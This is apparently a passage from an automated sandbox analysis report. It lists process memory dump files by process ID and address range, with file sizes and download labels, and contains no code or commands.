                        • memory/1516-240-0x00000000023C0000-0x0000000002B62000-memory.dmp

                          Filesize

                          7.6MB

                          Download

                        • memory/3844-80-0x00000000050E0000-0x00000000060B0000-memory.dmp

                          Filesize

                          15.8MB

                          Download

                        • memory/3844-111-0x00000000065E0000-0x000000000692F000-memory.dmp

                          Filesize

                          3.3MB

                          Download

                        • memory/3844-81-0x00000000065E0000-0x000000000692F000-memory.dmp

                          Filesize

                          3.3MB

                          Download

                        • memory/4000-9-0x000001B0C9B90000-0x000001B0C9BB2000-memory.dmp

                          Filesize

                          136KB

                          Download

                        • memory/4000-10-0x00007FF888440000-0x00007FF888F01000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/4000-11-0x000001B0C78E0000-0x000001B0C78F0000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/4000-12-0x000001B0C78E0000-0x000001B0C78F0000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/4000-15-0x00007FF888440000-0x00007FF888F01000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/5004-52-0x00000210C23C0000-0x00000210C23CA000-memory.dmp

                          Filesize

                          40KB

                          Download

                        • memory/5004-33-0x00000210C1310000-0x00000210C1320000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/5004-32-0x00007FF886E70000-0x00007FF887931000-memory.dmp

                          Filesize

                          10.8MB

                          Download

                        • memory/5004-34-0x00000210C1310000-0x00000210C1320000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/5004-44-0x00000210C1F40000-0x00000210C1F84000-memory.dmp

                          Filesize

                          272KB

                          Download

                        • memory/5004-45-0x00000210C2260000-0x00000210C22D6000-memory.dmp

                          Filesize

                          472KB

                          Download

                        • memory/5004-50-0x00000210C1310000-0x00000210C1320000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/5004-51-0x00000210C23D0000-0x00000210C23E2000-memory.dmp

                          Filesize

                          72KB

                          Download

                        • memory/5004-60-0x00000210C1310000-0x00000210C1320000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/5004-72-0x00007FF886E70000-0x00007FF887931000-memory.dmp

                          Filesize

                          10.8MB

                          Download